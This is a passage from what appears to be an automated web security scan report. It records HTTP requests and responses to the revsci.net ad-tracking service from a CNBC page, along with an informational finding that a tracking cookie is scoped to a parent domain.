EYYON9mwCFD38Z7bwuOaLIkWnSpYGQrS9N/NHLraq+XHHPyc6uP0WHaZCECaLExNZii9II4+Own16NsrTAeV5XAXHgfld9uBcLh3poTW6fhwJ845Le00pp7tTZgvZPdq7HD3/13WJvsbtwI+YQbp1w0yQgLoBl3TfBajALnFHEsGJthFUzUP5B19iiKfkm52MuRMMCMTcICusa1b+Ltr9lKuAyh6t/Xg7C224y8nKFJwmWH4kubZ49AjrCZY6cTymswqqApRHHZhDelGbIXX4JrMIS0+aE9tjtPTYIHzoJ57JY99uTsBSB+WNv2lQYvT5PkV96hWAPmooA9FCronEBizWGdEnE3V0Hzw6+ykj02XZ+wso+h55VR9UWUXd4keI3nupV7cOvOu01JSgi23NaJLepeD5nG69fr3ek38GVZMK9hhpjeIc62eadlZvLbM0T4b4WtfgQOCbPxxCMHE6lrxDOtakbhm5tc4YocgjKNDR1/6YfiH+mZe+DMA51k+4IsIhigntMstNkcDkYa1UprKOIueeJZKM8MC5vBKvtjnv/xHDs90MQTatqF9eWWm+pJDojl44GmCn2Ohj7v5mSyy4uKRY9cL1u2MNAovkoa7Mn0C4kmhJ9lhRwMqMwfz78x2/lwMdBc718wm9N0yiUeMhkKks0s6qW7Xqw2SdQdbDFvcXvzULW3qgFeAHvDwPmPHSziub0EvZeJKWzWWLHuv+U0FoosdBa2NxEVGDk8II9ZWVCLqCDL/5SWW1N/bQ4FqFCqEumS/l+Cb5gTx4vs5ghq8bRjVGN1VK/GaZws6AK5kvkaCpwgwxns+nFQ7407k/fZs/Q/hP4MF1L4wSZYILbNBMPy/vnTMt8BStSq7RAAmKLE8/P7dPuVq8ktYnT2j52Bhr3mncphtNRpccpgn46S5JYO9scYAfaOmgvR89MT4APLRY7zrwYDa4hVKyShzQSWcni9E/1KIg7ZL5sRorT/nlYJWmzz0Pj5HyAJmC4tX7pqB1EQFrxRXeQKJKEK35yYg0UxKdKfPQtNY2wnalRD54z8z/mWLqlDSzHKbpOkrkhxTD/h9jP3ilRdtKXR56JZLb4UbZw8ZQDLz9fmnYRz4FVQpMulh0nk4/KPn+Wq+QKBBQjJogtz2RqlVfkHNmWgQTIM9rF57AAQK3nKJLI1lrdzVAnNIEVzBXDv/yOcyc/PZ9vT5nM8oudLSOHCuLua6tWHcHGGKJEbUnyMRWyU4hF3igiUJLznr2fW20c+mxVfTP6sns+qGFxMOwbT7fu8PscSzP19tIuNGzPflAD+a/nAX4lrGgmvKeXk3QjrCe+FnJY1OpieYm0UvLt2a35gPUVMf/T2wuEZlxxtGFAkn97MYdOamea5K6GTdP5ecy/OLjp65PsDjKzDXILmdYWXagRfngLj3wQpRmPUUznFzSi+X8rkaRrygBJIUyRAhprrb/dL2r+2Vqd75TQD/cVYe/Sb2a/ad6XsAyl8ppmF8v23m/WMY1jvepKa0SNMoTBL3fy7LpvCANROWBbLeeZDFBnKUTUu2jRK8Lr9pOWjZE3J6S9o1SFSfOYQDxH3DoyDP/y5L5EL6O6WTMV4DFPGLdcJE6SU2S+O5G7kJl/3grE/rIdhc4wBmGg==; rsiPus_ev9c="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kHZDxR3whtWkMyxtyYOvGoBpIcccljoPMhFn371MBxSEms5vk/TPadDEwiUH26k1Suk/5yFLD1oVWvIeMQNQ+PB0PJ2o8X6fgTgwbcjQ35dwiELgcUZKS88cbki+Tf1TJDZiX+odzPhjd5ju++4pkJrTqzBa4+z+xVJ+UzKQ1vrYuatTG+1XIkntKVIqBCSYpw9dADc32REgAolVIyvZJyCvT8yQLvfAubwsprlYEjha//Sqn0tm6zTiAiIlSJqTZdmob3VCzgA0G2X8bBgFU7ZVTA6Nm1fBhrKlCQpuOd0NW5tO8NSacHb1XiaGNenTQTxOo2VP/e2fxUcWyJ15snEKjljmmwbCEC2saWy5GsU+hvHgesc0SDs0uEbVNX3N1fZQRZ6NpmEnrDr6XblNXHLrFJ3i5zr8tqdU34/B4U7LcLHtzZ0Sg1PQDv4yMIGj+zE0DscoYtShQMzQmsknFaJpA0+cvFFsnap3dNhbvXJ2B0wtqGHEVyvpJiDAtOJ0nCoKAXeE4e1qbnZ/srurzSsgOE8BpOs1PVIZFS5jGTvOR0jYtjTPi4ysdnQqvH6P6o5JSHZ70Cr+yWtZoaB14YE24kHZVWARSDY2f0ykDWjIv/jmL1dnWO8IqIVT+J5nyOZEkaEmpZu3pP5coVtl4L9WzOpjBs/qexePminO9R94+GAYZ9nTNATNkf0k5ZxVV0a3ikosxWPCqFK2jkoNAdp2F1efwa00shDJKwvcOv7k4h2GIdFg+u8oFahyT0CKQAvOWQILTWTYO0wic2kr1mnZfo9hNrMYQhMeBw1TelukndsBHuFQxZwpC9C3SfCIIPvjRNUz/xhi7logpBSJ1hUfEXrEWLVe0LoO3piMgyi/wseTHjf4tkxwPgdwAE4e+s25/O411QHOJtzxsU8UtIR7QU8AaHU5+RTHB6B9zJ7lTytu2yDKvKay4hcBeTFKjwOGqJMuHx9cLcH+MTtbRv16RsTmiAhRy5C2A1TfRTk+qJjAl8svgbNZbx750nPcZS9DdMmDkO2P8gDXpQfSWQVcWFTRwEb+XmNHZspPCkdoR96u6N8B0Klw7O/CLDCZmUTUp529HNqpmciGBK+zYVIgGYZQyCjJpDVNRLvf2om1fWscCZRnB1jWZE1BbnsJDcVTB6LY2Ollf6H3aEOFaWYvW6lDMGrqfVho6JHblV7YIXULd5dUQvRc0DCpykomf9hkJzOk43cKQzNhK77LWOOEDiNr7oTqK1iUFY3s0+1z4dKVm6XyypxZlZkviVcn9/ysd9NcKbcC7Ftkj6Y4ojL7Z778T16dIFhLfGg=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0m465baNxlQjRVrm76xoeXKd+oD/z+k563yJSnxDgB9BoshUkqN2MF/vfQ03ea69k3usr0THeqRusRn9KB39Zdv2hDh6RiPjHMpGwl7qzRB5eGo8GXOa1cwsHj5LNpFUOgdNaxE0KDMWcpRZkC09IWKwLqpNQkuxoXYih5PJZ0gmuidZVc7/uuOinzqwcuujjrSFdDRG7FArDUD7k09ajTDzzCOJXGdTKzd1dhCqdcK/DW51mcetICbCYwRWXwz4MKEEm7SUVd6CUcoDnUzXeAi/Ct/TuruCiMtayswY0AtigC9uSei/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XiKBS91uetAb3fI46x9yMJ/o2oOsDTZ6ASf282CVOAOSDpU+OHdhOmqH9DP7OtPyI6vpq0c0TJMTJpGN2v3qnTngdFXvmkjFzfQDqfRNW2H8nT3C4KuRGTu9pkIwnJOtJqqDL8ZlTqm1tx4nqVc24up7SInWtNx7NFc7BxYxVco7bMzrE92J6UpgIp+yIztei9sPUzKynkQ9sWomHNvCzgP6ccGH8UvNnL5S58r+C3uBIymBfMwCvaXNTp18jRw9bdzEAOKb+qPhJo2AzufW18Ipx1vLKfY/TG4Sp9FjObanLCuB+4RbNM07gH6sAorjAwk2VCaMxDYuK+Z6En1QLphqu4wVZF2sjYw/FLOEaI16MAcrkG79ISvFyZGbyjJp9essYi+wchn4V07oHr4dabBjwFR23PZeiphiesFNb+cyoVNdyhlP9w/XvrRQbPBAWDY0BdGhwsISrxQ+u+ryCatQscxIVtB+Mwv0jFEprhvzuE0kVIS28+gd2bm+WSGHVOCMciv9JataWaBZQGfs6pUvPzds1P7KLxuAwEiX2zwbSYB7Gyjxy5Ia+BODCRc7SrZGeKnnpYfoIxNaRDKG7ninMFwF5gUNLyPVADN9lLUNfpYq+gra8ruVbtIC9afAD+iMhSFR9G5D6am9KIP5qY5BtyqvGL7PgN9EQlf5YS5uFdp6OAWsS85f4uJA/1M18GXGH6VooGjXZ3JB53qQLC2jhFERFULUGK8hAP05FF4IAwyRZb//TP6jb0nMur7K/oLqkUMul59jgfatca2IGGoh+R8wHelSB+bIT+TFPB4/jTcZcMN9sMu0jqWGZULTrTbPcbBlbE2KvXKE8ku9NIu7MKwy7jVdpXlHoawd0H4MbxqbO9vbYm7lf62hk2RI+ZhLEO1Eb3oVuyPUXxnTs+50FTr1kui3jEbyG99/fl2p572qawJyun7+6BhaM7j58xj77SQrGpZRWWa0mGe+r+5cJtwfs682IV+EwJjWKra7kb4NpMIusVevkyB5dkie0Lcy0k1F0XKu3Vdvht6L/iOqc19nqe3Z7xLH8NuacTm9qxpjMhx/Q7zD9eCbQy4Lo2ZtueYSKTE7VS36vSfGiQRYAbOnZoiYijNGhHMhybjl7/ACKHvbdfZpAs8Pt8o8wpjCN+nX8GTIMjMqpObF2Z6TGv0ZNT419GeEQfxaZzvg3Ny5iJT+tzBf6taQvSuL20MSJoOKwtq5w71FxjQ4PfS0acqyVNHDjxz1SNnaoX1obgsk73xWeD/zKt49u9tJAd/HzQ9zO2ck4qrqDzIaBLiYrpnQOFzl53yTbK0ZjjRPLfkTqekmk0FO63N+958vGrs7cjCxS0xln3boIB2H/+OFOKJgheBCIQ4QyzN2mjA4mni5rdsSitq7Hit0QKw=="; rsi_segs_1000000=pUPF5EmhOXMQT7uItGF29/wo/pksqCQLAjTX17ExC9pU+w6+9L5G+41oDVUZb5s2bLaVRvfQR3q+JAPZsHPQAeKqGIBe29KcHj26N4xs7hmYBirHPenAoOiiNdW7VLFCCto7N6nVZ81kacJtRa+8imVzfQxrgpzC+yIxathSQeQW0qJH3l8R37RA6tSwgWTgyzUf62rbXpSNNSqVBmuk9HACSaKUrzfCNa3Wez3qXdT/Yzmv3b6rgFvQL1PxlfuuV1G5FOeSLG4+dndFB4sgHZbX6Izeb0BQW7eSWfctOeOgEBlK3gIUIeezXHWIb5C8PrxcDOlBtJCi8grDKVoer8fBx+FHPabiI5hkKBBMvM5s4iA6NX2EIrGpYGIJlnjykUlVu1Hlpn4i96MrC4qc76DVvDoQaIb9MkhSIFnfSOxBVz9ktfdYEbLJqm5qKK8whCvdRIQx1iPPJvwJtjfOSJIkFFVOBua0sgrfR6vLU5W3+BuOxgJnwoZ8hMy1iobucwqBAI10B6IgoRU3dvZR96i2Y6FhN9rr6yxQ7oX/UfopkOCoeKgcvvbf7ORlq5vYhypxB9yPcx9fHySNkzzHpYxz9GOHPtbIxtmQqoHNwjTNJ37sGr81KOBFhEvIKsmAwe8IcdFIQUEHcKRLGlOvYsZqZOVasUYjAM+HGw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhTNumEx3FIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2GVl/GdrOMZ/Y+D7DfNeIzfEE3nvwziDXX9CzNUOZtt+UwJ4ENj88LMHK32+yHR2CfYwWmRtEdrfVZpwkrg+Sti3jYb16vkgNMv/DKSvNtqpQ3ouyotNJqnSwTH9pyof7RRAFyoe8qE/qSmTRbvNjMxkdYEeYuQcwicjtUZzfO2tWeeW9DbFUkE3KIrgqiGYornVEiz1OU84Rr4srcj33Q4Rz6lHqJMmuBS33n3/zpEOEBfycxar9lEB6PcW6WYJNfQr6xk587qz6i6ZqBG6s7it+ux+euNMethetarg55J1GgGpAz+A6YCKx77wOIpIiOv7fks8hSdzNpwUI1yOq8D840Is1Y4bGzaaV2HAzES7hMbIMbuVH6Uih8aDMyGfgcZP9qFLRSStfA5T2fzA038WznlvEGRiw/5mSy4Znt1LdQM07Z506FXv/3DdbxtEhIVP+TgW5oribh1MJ++eCSrdPtS48Sgum0nh1QxE//f0z; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:07:24 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:07:23 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.147. http://pix04.revsci.net/I10985/b3/0/3/1008211/325815715.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/325815715.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhVhzYHWo07/vimX9eWOHz1Io60LZeoZK0fPDkiGU8HXulrRJtAG5InIPagRevfCEalQGjoIVztNEgbsNgBbQNwDt1/00FPGESYSukjOCdF1MH095+w6kmZgwek1xMiaLo478io+VkwjFp+NXLnMiX9F07sFEz+9pMTLi48TgR70M0yHEBiufdkDpoHw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:58:33 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/325815715.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_GGsx="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudNqQAOkdAaA6yg6yEdCljXybknYYDAKPqjtizoHf5iqPiyCgqe7ihtvDaMnTyr8hvk/1zvGDoKVMLvpIARTfXWibSIPnJq7tzx2HS5mSxNK9mEK0LUJBBtxfTkHhZQLIVRUl4qoS0+OQupm8jHDkDKZ79o3x4Qn7O03gGlrmlSm5dQ1Wo4HtdRYW6Pa3HpWm0VTDbWFMX+6+JbUf7qfyyxIupsApMhhq8VT5jt/7R48YqgOcnJSyZQsV/wAOcMMBHHmlG7HBvCJq3psFFpUsNL05WZ/+kPT4CfotTtTBhSuHMjJt1wm7ttZ8c0blcYOiX/EFPDqhadpm4fXRaKBpON0DYarpsG/a+4TjoYOKSxJVEN0FcDU6ianL98s+5wyCqQbwfAsfAqkbJG9v+8yN9CwtID4gk/ruow64Z9qL0CNMKZAhuzQQvb6F173L+trORXaEDkEwRt/2wUV8S/Ej8t+ldkzQ7m7ZOxhkuZ15w5IN6rOvhcjfhO6wERXjnEko61iXmVbOSNg9MPBLJPduQnwi9tLapT1frEupyDOaVTZ1bHtSa2Td5qS/xO2wEkZouyGk9IGnvtapZ/KkNNw4/pxAZ62mS4Eva3s+0SNaPowEXYVxghTjS7MpK3IFYknqXR61Nm2O8oqIVXeJ0mGwWzRRBm1Zu3rPZMoVud6PhsVUqjiJA6u5jRJSmo8/txZvOqIAE9IG6IRtfOSHXFXvd5/QB5Y4KMfWU4+QL/NAfexYotOnZ7zcXwfVZ2u7G63Ni8FuzYvVbXMhci2J/+Uw0/57sW/Cdie+kg39htCmJliRLKSBqevzcOmWADf+VMlWcGNXPcAKopmM02qK+vypTONY9RUu7M9a9IcqRh0s23c5uWuZotrEq2vVH45iRAJQ0Wl11sPlb6C2c2+y7BtMMrb6B9BIKYA38VgCBPC+akPx0OB/uLgMs3yfZx67VNPRsEBHTCtOaygRfBeTWeOuqpFTzSeiVvL4O+TMEXQv1gRvjmhIhR+Jg2IlSsRTkvrPmDDRN4lRiHisQED/kvhlSQWT6a1FrGj7GCTIo42NPiwKz4qugeWCVQZCBECzIpxyQKRP5U4Ls03NIUrc3UO32LIQISMewM8/8A1o1DPCUWJ0UMmqTF5zaRQcixff4PN+q4I263ge7qagqOaUhknot1/9PPWADJa+SfHTtEHQkgnPhkMhM6dKMBwpisq7uxr4mgZ7KjLG/12MYHHvHyDvJji+J6Nj5twuiGVNl3lw287zMvbwXihQsnofA46jxNz5GrwPu1sdjYs+EGgwnNbWoUFos8c9NdfyXxVJf34UhRPKLW830eHapet"; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRUnyJCk8YM/Hg5qLS9hklPbtk1DrJekn2UyPAWyhTgzx+Bxp0K1pS+qjAdJg12fAnIxLytftYp+1O96vla9iId6BojFl6Bi/CWrd1S5STjUG25FAOwRDxY6oikceGSEZfYtKK4ARmUo0J//6ghQMwCfLURDcSUpOAWiA9vUNwj4pz3Cw+U7rTi0hPQqSrtbA66B3kFvE1f0TDUherk0nmHV/dIZFG/IkqQ/UEFkQDh0BkG3a9uSX3CYN46MylzHrrScn9vd51iqfuw99lCDChbcFXz+WxPTtCqMu/bkygy4tmNkZO25SZLZWaMRkEyJ/9luf2te0/du4eEWtieXpjJNURgFdfGFIZdTCD9s9skCJLaxSmfJHonBB4XQPVwE2ZleD3BWP3RgOqqH9DPHBlNyI6v5i0Q3QJcR4YA1m4lUcWSfsyI70dNh2Y9k6fR8u2zCeSNMpFjo93jcW9t2nCBHnY0ZarNyHYB+R5IAw8ItvdgfR6vY/IobO3Y1LM1cHqtLyn5CDwgkxxRWakznUHGCdW5gu8xl+S5lSVSzC68EQLryJ2kL/M+9wzdzfYJRZ4rV3n+z1mPC4RG2sCPSKnvojwQRRuEoODehkR8w8Jf3aJXruhhQyNpBCWe/7U4VkSvjxUDPql593RxJyB0bOZOuWgOBmK4L81yHNk+LHEzhSglvcMIsOLsiKjp2EYHE3xgNoQYZ0TLeTQ9H99Cg+YXA4UVaTVFky+rbh3ZsF6cesfvVvVOrtlKoAnGc9+aQNP4+fViDg1D8KGg6TLSutVdjc2BNQeGlnPwESwwvyxg9a